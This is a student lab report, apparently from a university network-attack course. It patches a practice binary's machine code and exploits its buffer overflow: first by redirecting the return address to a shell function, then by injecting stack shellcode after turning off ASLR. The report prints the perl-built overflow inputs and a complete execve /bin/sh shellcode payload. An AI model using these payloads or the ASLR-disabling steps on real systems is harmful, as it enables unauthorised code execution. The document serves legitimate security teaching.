2018-2019-2 网络对抗技术 20165227 Exp1 PC平台逆向破解

实验内容及步骤

实验一：直接修改程序机器指令，改变程序执行流程

• 知识要求：Call指令，EIP寄存器,指令跳转的偏移计算，补码，反汇编指令objdump，十六进制编辑工具

• 首先将pwn1目标文件进行备份 cp pwn1 pwn5227

• 对pwn5227文件进行反汇编 objdump -d pwn5227 | more

• 并找到main函数中调用foo函数的机器码
  
  

• 使用 vi pwn5227 进行编辑
  
  

• 在vi里面进行以下步骤

• 使用 :%!xxd 显示模式切换为16进制模式

• 使用 /e8d7 查找要修改的内容

• 使用 r 将d7修改成c3，保存并退出

• 将16进制转换回原格式 :%!xxd -r，退出

• 再次反汇编pwn5227，发现函数调用已更改
  
  

• 结果验证
  
  

实验二：通过构造输入参数，造成BOF攻击，改变程序执行流

• 知识要求：堆栈结构，返回地址 学习目标：理解攻击缓冲区的结果，掌握返回地址的获取 进阶：掌握ELF文件格式，掌握动态技术

• 将pwn1再次备份，得到pwn2

• 对pwn2进行GDB调试，运行并输入进行尝试 1111111122222222333333334444444412345678
  
  

• 从结果中得到ASCII码值 0x34333231 也就是1234

• 我们需要做的就是将其替换成getshell的返回地址 0x0804847d

• 生成包含字符串的文件 perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input
  
  

• 使用命令 (cat input;cat) | ./pwn2 ，将input的内容作为./pwn2的输入，并验证结果
  
  

实验三：Shellcode注入攻击

• 准备工作

apt-get install execstack安装execstack

# execstack -s pwn1    //设置堆栈可执行

# execstack -q pwn1  //查询文件的堆栈是否可执行

# echo "0" > /proc/sys/kernel/randomize_va_space //关闭地址随机化

# more /proc/sys/kernel/randomize_va_space  //查看地址随机化是否已经关闭

• 注入攻击
  
  

• 再重新打开另一个终端 ctrl+shift+t

• 首先需要找到进程号
  
  

• 可知进程号为 101286

• 使用gdb调试进程

gdb

attach 101286

disassemble foo

break *0x080484ae

(运行另一个终端中的pwn1按下回车后）

c

info r esp

x/16x 0xffffd2ac

• 得到的地址+4，得到shellcode的地址是 0xffffd2b0
• 输入指令

perl -e 'print "A" x 32;print "\xb0\xd2\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x20\xd3\xff\xff\x00"' > input_shellcode

• 最后验证结果
  
  

遇到的问题

• 在安装execstack的时候出现了```无法定位软件包的原因，通过查阅资料得知，应该更新源
  
  

之后就能顺利安装了

实验感想

• 这次的实验是网络对抗的第一次实验，也是第一次清晰地感受了一次之前学过的缓冲区溢出攻击实现的实验，通过实验，对老师上课讲的知识点有了更深的理解，同时也对操作熟练程度有了加深，希望之后也能学到更多。

思考题

• 漏洞
• 漏洞是软件编程中的纰漏，是会导致程序运行失败、系统关机、重新启动，或者执行攻击者的指令。
• 危害：会对系统的安全性造成影响，并且容易造成重要资料的丢失或窃取等严重后果